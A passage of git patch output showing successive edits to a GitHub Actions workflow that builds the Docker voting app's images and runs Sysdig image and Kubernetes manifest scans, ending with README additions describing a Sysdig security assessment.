a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index 22c3c08019..19d52f0a86 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -27,12 +27,12 @@ jobs: docker build -t vote-image ./vote docker save vote-image -o vote-image.tar - - name: Scan Docker image from archive with Sysdig (standalone) + - name: Scan Docker image from archive with Sysdig (v1.24.2) run: | docker run --rm \ -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \ -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar \ - quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ + quay.io/sysdig/sysdig-cli-scanner:1.24.2 \ --standalone \ --input-file /tmp/vote-image.tar \ vote-image:ci @@ -42,6 +42,6 @@ jobs: docker run --rm \ -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \ -v ${{ github.workspace }}:/iac \ - quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ + quay.io/sysdig/sysdig-cli-scanner:1.24.2 \ --apiurl ${{ secrets.SYSDIG_API_URL }} \ --iac scan /iac/k8s-specifications From 09c311cdb87f6969e6e0cbec4ce9ab1c90b0b2b5 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 21:26:29 +0900 Subject: [PATCH 58/73] Fix: use --standalone --input-file with CLI latest --- .github/workflows/sysdig-scan.yml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index 19d52f0a86..b309e67c37 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -27,12 +27,13 @@ jobs: docker build -t vote-image ./vote docker save vote-image -o vote-image.tar - - name: Scan Docker image from archive with Sysdig (v1.24.2) + - name: Scan Docker image from archive with Sysdig run: | docker run --rm \ +     --platform linux/amd64 \ -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \ -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar \ - quay.io/sysdig/sysdig-cli-scanner:1.24.2 \ + quay.io/sysdig/sysdig-cli-scanner:latest \ --standalone \ --input-file /tmp/vote-image.tar \ vote-image:ci @@ -40,8 +41,9 @@ jobs: - name: Scan IaC (k8s-specifications) run: | docker run --rm \ + --platform linux/amd64 \ -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \ -v ${{ github.workspace }}:/iac \ - quay.io/sysdig/sysdig-cli-scanner:1.24.2 \ + quay.io/sysdig/sysdig-cli-scanner:latest \ --apiurl ${{ secrets.SYSDIG_API_URL }} \ --iac scan /iac/k8s-specifications From 8d76915f62409d71b5573c69c78993a87b24007f Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 21:29:42 +0900 Subject: [PATCH 59/73] Fix: use --standalone --input-file with CLI latest --- .github/workflows/sysdig-scan.yml | 41 +++++++++++-------------------- 1 file changed, 14 insertions(+), 27 deletions(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index b309e67c37..bc660148e1 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -16,34 +16,21 @@ jobs: runs-on: ubuntu-latest steps: - - name: Checkout code - uses: actions/checkout@v3 + - name: Checkout code + uses: actions/checkout@v3 - - name: Set up Docker Buildx - uses: docker/setup-buildx-action@v2 + - name: Set up Docker Buildx + uses: docker/setup-buildx-action@v2 - - name: Build vote image - run: | - docker build -t vote-image ./vote - docker save vote-image -o vote-image.tar + - name: Build vote image + run: | + docker build -t vote-image ./vote + docker save vote-image -o vote-image.tar - - name: Scan Docker image from archive with Sysdig - run: | - docker run --rm \ -     --platform linux/amd64 \ - -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \ - -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar \ - quay.io/sysdig/sysdig-cli-scanner:latest \ - --standalone \ - --input-file /tmp/vote-image.tar \ - vote-image:ci + - name: Scan Docker image with Sysdig (latest + amd64) + run: | + docker run --rm --platform linux/amd64 -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar quay.io/sysdig/sysdig-cli-scanner:latest --standalone --input-file /tmp/vote-image.tar vote-image:ci - - name: Scan IaC (k8s-specifications) - run: | - docker run --rm \ - --platform linux/amd64 \ - -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \ - -v ${{ github.workspace }}:/iac \ - quay.io/sysdig/sysdig-cli-scanner:latest \ - --apiurl ${{ secrets.SYSDIG_API_URL }} \ - --iac scan /iac/k8s-specifications + - name: Scan IaC (k8s-specifications) + run: | + docker run --rm --platform linux/amd64 -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} -v ${{ github.workspace }}:/iac quay.io/sysdig/sysdig-cli-scanner:latest --apiurl ${{ secrets.SYSDIG_API_URL }} --iac scan /iac/k8s-specifications From 0f65abeb72758c882284e9a6a37e927477ef54e3 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 21:36:20 +0900 Subject: [PATCH 60/73] Fix: use --standalone --input-file with CLI latest --- .github/workflows/sysdig-scan.yml | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index bc660148e1..dec3eef9a4 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -27,10 +27,15 @@ jobs: docker build -t vote-image ./vote docker save vote-image -o vote-image.tar - - name: Scan Docker image with Sysdig (latest + amd64) + - name: Download Sysdig CLI Scanner run: | - docker run --rm --platform linux/amd64 -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar quay.io/sysdig/sysdig-cli-scanner:latest --standalone --input-file /tmp/vote-image.tar vote-image:ci + curl -LO https://download.sysdig.com/scanning/sysdig-cli-scanner/latest/linux/sysdig-cli-scanner + chmod +x sysdig-cli-scanner + + - name: Scan Docker image from archive with Sysdig (binary) + run: | + ./sysdig-cli-scanner --standalone --input-file vote-image.tar vote-image:ci --console-log --detailed-policies-eval --full-vulns-table -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} - name: Scan IaC (k8s-specifications) run: | - docker run --rm --platform linux/amd64 -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} -v ${{ github.workspace }}:/iac quay.io/sysdig/sysdig-cli-scanner:latest --apiurl ${{ secrets.SYSDIG_API_URL }} --iac scan /iac/k8s-specifications + ./sysdig-cli-scanner --apiurl ${{ secrets.SYSDIG_API_URL }} --iac scan ./k8s-specifications -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} From 074d20b7b590981d7364f81ce85fadd26a1e392e Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 21:43:41 +0900 Subject: [PATCH 61/73] Switch to CLI-based Sysdig scan using curl --- .github/workflows/sysdig-scan.yml | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index dec3eef9a4..fab4d341aa 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -27,15 +27,19 @@ jobs: docker build -t vote-image ./vote docker save vote-image -o vote-image.tar - - name: Download Sysdig CLI Scanner + - name: Download Sysdig CLI Scanner (latest for amd64) run: | - curl -LO https://download.sysdig.com/scanning/sysdig-cli-scanner/latest/linux/sysdig-cli-scanner + curl -LO "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/$(curl -L -s https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt)/linux/amd64/sysdig-cli-scanner" chmod +x sysdig-cli-scanner - - name: Scan Docker image from archive with Sysdig (binary) + - name: Scan Docker image from archive run: | - ./sysdig-cli-scanner --standalone --input-file vote-image.tar vote-image:ci --console-log --detailed-policies-eval --full-vulns-table -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} + ./sysdig-cli-scanner --standalone --input-file vote-image.tar vote-image:ci --console-log --detailed-policies-eval --full-vulns-table + env: + SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} - name: Scan IaC (k8s-specifications) run: | - ./sysdig-cli-scanner --apiurl ${{ secrets.SYSDIG_API_URL }} --iac scan ./k8s-specifications -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} + ./sysdig-cli-scanner --apiurl ${{ secrets.SYSDIG_API_URL }} --iac scan ./k8s-specifications + env: + SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} From cc5fa035e9a31fc4713375d52f487c87ea828625 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 21:49:05 +0900 Subject: [PATCH 62/73] Switch to CLI-based Sysdig scan using curl --- .github/workflows/sysdig-scan.yml | 17 ++++------------- 1 file changed, 4 insertions(+), 13 deletions(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index fab4d341aa..dabf240a00 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -12,7 +12,7 @@ on: jobs: scan: - name: Sysdig Scan Docker + IaC + name: Sysdig Scan Docker + IaC (Docker version) runs-on: ubuntu-latest steps: @@ -27,19 +27,10 @@ jobs: docker build -t vote-image ./vote docker save vote-image -o vote-image.tar - - name: Download Sysdig CLI Scanner (latest for amd64) + - name: Scan Docker image from archive with Sysdig run: | - curl -LO "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/$(curl -L -s https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt)/linux/amd64/sysdig-cli-scanner" - chmod +x sysdig-cli-scanner - - - name: Scan Docker image from archive - run: | - ./sysdig-cli-scanner --standalone --input-file vote-image.tar vote-image:ci --console-log --detailed-policies-eval --full-vulns-table - env: - SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} + docker run --rm --platform linux/amd64 -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar quay.io/sysdig/sysdig-cli-scanner:latest --standalone --input-file /tmp/vote-image.tar vote-image:ci - name: Scan IaC (k8s-specifications) run: | - ./sysdig-cli-scanner --apiurl ${{ secrets.SYSDIG_API_URL }} --iac scan ./k8s-specifications - env: - SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} + docker run --rm --platform linux/amd64 -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} -v ${{ github.workspace }}:/iac quay.io/sysdig/sysdig-cli-scanner:latest --apiurl ${{ secrets.SYSDIG_API_URL }} --iac scan /iac/k8s-specifications From 43c36ca63e0f6ce78a18e203a31b4292f6edb513 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 21:52:55 +0900 Subject: [PATCH 63/73] Switch to CLI-based Sysdig scan using curl --- .github/workflows/sysdig-scan.yml | 13 +++++++++---- 1 file changed, 9 insertions(+), 4 deletions(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index dabf240a00..dbd48c05b8 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -12,7 +12,7 @@ on: jobs: scan: - name: Sysdig Scan Docker + IaC (Docker version) + name: Sysdig Scan Docker + IaC (loaded image method) runs-on: ubuntu-latest steps: @@ -27,10 +27,15 @@ jobs: docker build -t vote-image ./vote docker save vote-image -o vote-image.tar - - name: Scan Docker image from archive with Sysdig + - name: Load and tag image run: | - docker run --rm --platform linux/amd64 -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar quay.io/sysdig/sysdig-cli-scanner:latest --standalone --input-file /tmp/vote-image.tar vote-image:ci + docker load -i vote-image.tar + docker tag vote-image:latest vote-image:ci + + - name: Scan Docker image using tag + run: | + docker run --rm -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} quay.io/sysdig/sysdig-cli-scanner:latest --apiurl ${{ secrets.SYSDIG_API_URL }} vote-image:ci - name: Scan IaC (k8s-specifications) run: | - docker run --rm --platform linux/amd64 -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} -v ${{ github.workspace }}:/iac quay.io/sysdig/sysdig-cli-scanner:latest --apiurl ${{ secrets.SYSDIG_API_URL }} --iac scan /iac/k8s-specifications + docker run --rm -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} -v ${{ github.workspace }}:/iac quay.io/sysdig/sysdig-cli-scanner:latest --apiurl ${{ secrets.SYSDIG_API_URL }} --iac scan /iac/k8s-specifications From ec74eaaf09afdb1d191b589d4f6ee2f0fe523687 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 21:57:29 +0900 Subject: [PATCH 64/73] Switch to CLI-based Sysdig scan using curl --- .github/workflows/sysdig-scan.yml | 13 ++++--------- 1 file changed, 4 insertions(+), 9 deletions(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index dbd48c05b8..217f566d07 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -12,7 +12,7 @@ on: jobs: scan: - name: Sysdig Scan Docker + IaC (loaded image method) + name: Sysdig Scan Docker + IaC (with docker.sock) runs-on: ubuntu-latest steps: @@ -25,16 +25,11 @@ jobs: - name: Build vote image run: | docker build -t vote-image ./vote - docker save vote-image -o vote-image.tar + docker tag vote-image vote-image:ci - - name: Load and tag image + - name: Scan Docker image using docker.sock run: | - docker load -i vote-image.tar - docker tag vote-image:latest vote-image:ci - - - name: Scan Docker image using tag - run: | - docker run --rm -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} quay.io/sysdig/sysdig-cli-scanner:latest --apiurl ${{ secrets.SYSDIG_API_URL }} vote-image:ci + docker run --rm -v /var/run/docker.sock:/var/run/docker.sock -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} quay.io/sysdig/sysdig-cli-scanner:latest --apiurl ${{ secrets.SYSDIG_API_URL }} vote-image:ci - name: Scan IaC (k8s-specifications) run: | From a61b8fccaf3743becc6a98fae5a45bf9de309afb Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 22:10:31 +0900 Subject: [PATCH 65/73] Bonus --- .github/workflows/sysdig-scan.yml | 23 ++++++++++++++++------- 1 file changed, 16 insertions(+), 7 deletions(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index 217f566d07..41b098fff9 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -1,4 +1,4 @@ -name: Sysdig CI Scan +name: Sysdig Tech Assessment CI on: push: @@ -12,24 +12,33 @@ on: jobs: scan: - name: Sysdig Scan Docker + IaC (with docker.sock) + name: Build & Scan Docker Images + IaC runs-on: ubuntu-latest steps: - - name: Checkout code + - name: Checkout repository uses: actions/checkout@v3 - name: Set up Docker Buildx uses: docker/setup-buildx-action@v2 - - name: Build vote image + - name: Build Docker images run: | docker build -t vote-image ./vote - docker tag vote-image vote-image:ci + docker build -t worker-image ./worker + docker build -t result-image ./result - - name: Scan Docker image using docker.sock + - name: Scan vote image run: | - docker run --rm -v /var/run/docker.sock:/var/run/docker.sock -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} quay.io/sysdig/sysdig-cli-scanner:latest --apiurl ${{ secrets.SYSDIG_API_URL }} vote-image:ci + docker run --rm quay.io/sysdig/secure-inline-scan:2 vote-image --sysdig-token ${{ secrets.SYSDIG_SECURE_TOKEN }} --sysdig-url ${{ secrets.SYSDIG_API_URL }} + + - name: Scan worker image + run: | + docker run --rm quay.io/sysdig/secure-inline-scan:2 worker-image --sysdig-token ${{ secrets.SYSDIG_SECURE_TOKEN }} --sysdig-url ${{ secrets.SYSDIG_API_URL }} + + - name: Scan result image + run: | + docker run --rm quay.io/sysdig/secure-inline-scan:2 result-image --sysdig-token ${{ secrets.SYSDIG_SECURE_TOKEN }} --sysdig-url ${{ secrets.SYSDIG_API_URL }} - name: Scan IaC (k8s-specifications) run: | From 29ff245f6ddc6806f9eaf75356829c01438c1270 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 22:14:46 +0900 Subject: [PATCH 66/73] Bonus --- .github/workflows/sysdig-scan.yml | 36 ++++++++++++++++++++++--------- 1 file changed, 26 insertions(+), 10 deletions(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index 41b098fff9..5c511460a7 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -1,4 +1,4 @@ -name: Sysdig Tech Assessment CI +name: Sysdig Tech Assessment CI (CLI Scanner) on: push: @@ -12,7 +12,7 @@ on: jobs: scan: - name: Build & Scan Docker Images + IaC + name: Scan vote/worker/result with CLI Scanner + IaC runs-on: ubuntu-latest steps: @@ -22,24 +22,40 @@ jobs: - name: Set up Docker Buildx uses: docker/setup-buildx-action@v2 - - name: Build Docker images + - name: Build and save Docker images run: | docker build -t vote-image ./vote docker build -t worker-image ./worker docker build -t result-image ./result + docker save vote-image -o vote-image.tar + docker save worker-image -o worker-image.tar + docker save result-image -o result-image.tar - - name: Scan vote image + - name: Download Sysdig CLI Scanner (latest Linux amd64) run: | - docker run --rm quay.io/sysdig/secure-inline-scan:2 vote-image --sysdig-token ${{ secrets.SYSDIG_SECURE_TOKEN }} --sysdig-url ${{ secrets.SYSDIG_API_URL }} + curl -LO "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/$(curl -s https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt)/linux/amd64/sysdig-cli-scanner" + chmod +x sysdig-cli-scanner - - name: Scan worker image + - name: Scan vote image (.tar) with CLI Scanner run: | - docker run --rm quay.io/sysdig/secure-inline-scan:2 worker-image --sysdig-token ${{ secrets.SYSDIG_SECURE_TOKEN }} --sysdig-url ${{ secrets.SYSDIG_API_URL }} + ./sysdig-cli-scanner --standalone --input-file vote-image.tar vote-image:ci + env: + SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} - - name: Scan result image + - name: Scan worker image (.tar) with CLI Scanner run: | - docker run --rm quay.io/sysdig/secure-inline-scan:2 result-image --sysdig-token ${{ secrets.SYSDIG_SECURE_TOKEN }} --sysdig-url ${{ secrets.SYSDIG_API_URL }} + ./sysdig-cli-scanner --standalone --input-file worker-image.tar worker-image:ci + env: + SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} + + - name: Scan result image (.tar) with CLI Scanner + run: | + ./sysdig-cli-scanner --standalone --input-file result-image.tar result-image:ci + env: + SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} - name: Scan IaC (k8s-specifications) run: | - docker run --rm -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} -v ${{ github.workspace }}:/iac quay.io/sysdig/sysdig-cli-scanner:latest --apiurl ${{ secrets.SYSDIG_API_URL }} --iac scan /iac/k8s-specifications + ./sysdig-cli-scanner --apiurl ${{ secrets.SYSDIG_API_URL }} --iac scan ./k8s-specifications + env: + SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} From fd448389edc815f0fc77257b208d2d1458810809 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 22:21:59 +0900 Subject: [PATCH 67/73] Bonus --- .github/workflows/sysdig-scan.yml | 65 +++++++++++-------------------- 1 file changed, 23 insertions(+), 42 deletions(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index 5c511460a7..83221702ad 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -1,4 +1,4 @@ -name: Sysdig Tech Assessment CI (CLI Scanner) +name: Sysdig Scan (Official Action) on: push: @@ -12,50 +12,31 @@ on: jobs: scan: - name: Scan vote/worker/result with CLI Scanner + IaC + name: Docker + IaC Scan via Sysdig Action runs-on: ubuntu-latest steps: - - name: Checkout repository + - name: Checkout source uses: actions/checkout@v3 - - name: Set up Docker Buildx - uses: docker/setup-buildx-action@v2 - - - name: Build and save Docker images - run: | - docker build -t vote-image ./vote - docker build -t worker-image ./worker - docker build -t result-image ./result - docker save vote-image -o vote-image.tar - docker save worker-image -o worker-image.tar - docker save result-image -o result-image.tar - - - name: Download Sysdig CLI Scanner (latest Linux amd64) - run: | - curl -LO "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/$(curl -s https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt)/linux/amd64/sysdig-cli-scanner" - chmod +x sysdig-cli-scanner - - - name: Scan vote image (.tar) with CLI Scanner - run: | - ./sysdig-cli-scanner --standalone --input-file vote-image.tar vote-image:ci - env: - SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} - - - name: Scan worker image (.tar) with CLI Scanner - run: | - ./sysdig-cli-scanner --standalone --input-file worker-image.tar worker-image:ci - env: - SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} - - - name: Scan result image (.tar) with CLI Scanner - run: | - ./sysdig-cli-scanner --standalone --input-file result-image.tar result-image:ci - env: - SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} - - - name: Scan IaC (k8s-specifications) + - name: Build vote Docker image run: | - ./sysdig-cli-scanner --apiurl ${{ secrets.SYSDIG_API_URL }} --iac scan ./k8s-specifications - env: - SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} + docker build ./vote -t vote-app:${{ github.sha }} + + - name: Scan vote image with Sysdig + uses: sysdiglabs/scan-action@v6 + with: + image-tag: vote-app:${{ github.sha }} + sysdig-secure-token: ${{ secrets.SYSDIG_SECURE_TOKEN }} + sysdig-secure-url: ${{ secrets.SYSDIG_API_URL }} + stop-on-processing-error: true + + - name: Scan Kubernetes IaC manifests + uses: sysdiglabs/scan-action@v6 + with: + mode: iac + cli-scanner-version: 1.24.2 + iac-scan-path: k8s-specifications + sysdig-secure-token: ${{ secrets.SYSDIG_SECURE_TOKEN }} + sysdig-secure-url: ${{ secrets.SYSDIG_API_URL }} + stop-on-processing-error: true From 77a7478282a7b15232286f3e642a2c92258fcf48 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 22:36:59 +0900 Subject: [PATCH 68/73] Bonus --- .github/workflows/sysdig-scan.yml | 51 +++++++++++++++++++++++-------- 1 file changed, 39 insertions(+), 12 deletions(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index 83221702ad..2b4f6bbf1c 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -1,28 +1,31 @@ -name: Sysdig Scan (Official Action) +name: Sysdig Secure Scanning on: push: - branches: - - main - - ci/sysdig-integration + branches: [main, ci/sysdig-integration] pull_request: - branches: - - main - - ci/sysdig-integration + branches: [main, ci/sysdig-integration] jobs: scan: - name: Docker + IaC Scan via Sysdig Action runs-on: ubuntu-latest + name: Scan vote / worker / result + IaC steps: - name: Checkout source uses: actions/checkout@v3 - - name: Build vote Docker image - run: | - docker build ./vote -t vote-app:${{ github.sha }} + # Build Docker images + - name: Build vote image + run: docker build ./vote -t vote-app:${{ github.sha }} + - name: Build worker image + run: docker build ./worker -t worker-app:${{ github.sha }} + + - name: Build result image + run: docker build ./result -t result-app:${{ github.sha }} + + # Scan vote - name: Scan vote image with Sysdig uses: sysdiglabs/scan-action@v6 with: @@ -30,13 +33,37 @@ jobs: sysdig-secure-token: ${{ secrets.SYSDIG_SECURE_TOKEN }} sysdig-secure-url: ${{ secrets.SYSDIG_API_URL }} stop-on-processing-error: true + cli-scanner-version: 1.22.3 + + # Scan worker + - name: Scan worker image with Sysdig + uses: sysdiglabs/scan-action@v6 + with: + image-tag: worker-app:${{ github.sha }} + sysdig-secure-token: ${{ secrets.SYSDIG_SECURE_TOKEN }} + sysdig-secure-url: ${{ secrets.SYSDIG_API_URL }} + stop-on-processing-error: true + cli-scanner-version: 1.22.3 + # Scan result + - name: Scan result image with Sysdig + uses: sysdiglabs/scan-action@v6 + with: + image-tag: result-app:${{ github.sha }} + sysdig-secure-token: ${{ secrets.SYSDIG_SECURE_TOKEN }} + sysdig-secure-url: ${{ secrets.SYSDIG_API_URL }} + stop-on-processing-error: true + cli-scanner-version: 1.22.3 + + # Scan IaC - name: Scan Kubernetes IaC manifests uses: sysdiglabs/scan-action@v6 + continue-on-error: true # IaC scan failure should not block main scan with: mode: iac - cli-scanner-version: 1.24.2 iac-scan-path: k8s-specifications sysdig-secure-token: ${{ secrets.SYSDIG_SECURE_TOKEN }} sysdig-secure-url: ${{ secrets.SYSDIG_API_URL }} stop-on-processing-error: true + cli-scanner-version: 1.23.3 + From 74fba984edbb6584da30a18bbc1d4adc59026291 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 22:42:07 +0900 Subject: [PATCH 69/73] Bonus --- .github/workflows/sysdig-scan.yml | 11 +++-------- 1 file changed, 3 insertions(+), 8 deletions(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index 2b4f6bbf1c..464353d0d5 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -9,7 +9,7 @@ on: jobs: scan: runs-on: ubuntu-latest - name: Scan vote / worker / result + IaC + name: Scan vote / worker / result + IaC (stable, no version pin) steps: - name: Checkout source @@ -33,7 +33,6 @@ jobs: sysdig-secure-token: ${{ secrets.SYSDIG_SECURE_TOKEN }} sysdig-secure-url: ${{ secrets.SYSDIG_API_URL }} stop-on-processing-error: true - cli-scanner-version: 1.22.3 # Scan worker - name: Scan worker image with Sysdig @@ -43,7 +42,6 @@ jobs: sysdig-secure-token: ${{ secrets.SYSDIG_SECURE_TOKEN }} sysdig-secure-url: ${{ secrets.SYSDIG_API_URL }} stop-on-processing-error: true - cli-scanner-version: 1.22.3 # Scan result - name: Scan result image with Sysdig @@ -53,17 +51,14 @@ jobs: sysdig-secure-token: ${{ secrets.SYSDIG_SECURE_TOKEN }} sysdig-secure-url: ${{ secrets.SYSDIG_API_URL }} stop-on-processing-error: true - cli-scanner-version: 1.22.3 - # Scan IaC + # Scan IaC (k8s-specifications) - name: Scan Kubernetes IaC manifests uses: sysdiglabs/scan-action@v6 - continue-on-error: true # IaC scan failure should not block main scan + continue-on-error: true with: mode: iac iac-scan-path: k8s-specifications sysdig-secure-token: ${{ secrets.SYSDIG_SECURE_TOKEN }} sysdig-secure-url: ${{ secrets.SYSDIG_API_URL }} stop-on-processing-error: true - cli-scanner-version: 1.23.3 - From 03252f7465c3bb4c08126093408077932805ab73 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Mon, 21 Jul 2025 03:06:28 +0900 Subject: [PATCH 70/73] Trigger Sysdig CI Scan rerun From f653d0e0df2e2940deea33ca9c96a3d40d485d78 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Mon, 21 Jul 2025 10:23:02 +0900 Subject: [PATCH 71/73] Trigger Sysdig CI Scan rerun From 9c8df114fb27a45d12a28da32d5affd90be7bafd Mon Sep 17 00:00:00 2001 From: Keita Higaki Date: Mon, 21 Jul 2025 10:40:56 +0900 Subject: [PATCH 72/73] Update README.md --- README.md | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/README.md b/README.md index 8516424ba1..a563856d74 100644 --- a/README.md +++ b/README.md @@ -63,3 +63,16 @@ The voting application only accepts one vote per client browser. It does not reg This isn't an example of a properly architected perfectly designed distributed app... it's just a simple example of the various types of pieces and languages you might see (queues, persistent data, etc), and how to deal with them in Docker at a basic level. + + +## 📄 Sysdig Tech Assessment 成果レポート + +このリポジトリでは、Sysdig Secure を活用したセキュリティ検証(IaC / CI/CD / Runtime)を段階的に実施しました。 + +| フェーズ | 内容 | 成果リンク | +|----------|------|-------------| +| A | IaC 脆弱性スキャン + 初期Runtime Policy検証 | [assessment-report.md](./docs/assessment-report.md#フェーズa) | +| B | GitHub ActionsによるCI統合スキャン | [assessment-report.md](./docs/assessment-report.md#フェーズb) | +| C | Reverse ShellによるRuntime Threatの検出 | [assessment-report.md](./docs/assessment-report.md#フェーズc) | + +成果詳細:[`docs/assessment-report.md`](./docs/assessment-report.md) From e2d8b7c3eeb2955fa971f911eceefaaec0b03e4f Mon Sep 17 00:00:00 2001 From: Keita Higaki Date: Mon, 21 Jul 2025 10:44:42 +0900 Subject: [PATCH 73/73] Update README.md --- README.md | 122 ++++++++++++++++++++++++++++++++++++++++++++++++++---- 1 file changed, 115 insertions(+), 7 deletions(-) diff --git a/README.md b/README.md index a563856d74..5f09179a37 100644 --- a/README.md +++ b/README.md @@ -65,14 +65,122 @@ example of the various types of pieces and languages you might see (queues, pers deal with them in Docker at a basic level. -## 📄 Sysdig Tech Assessment 成果レポート +# 📄 Sysdig 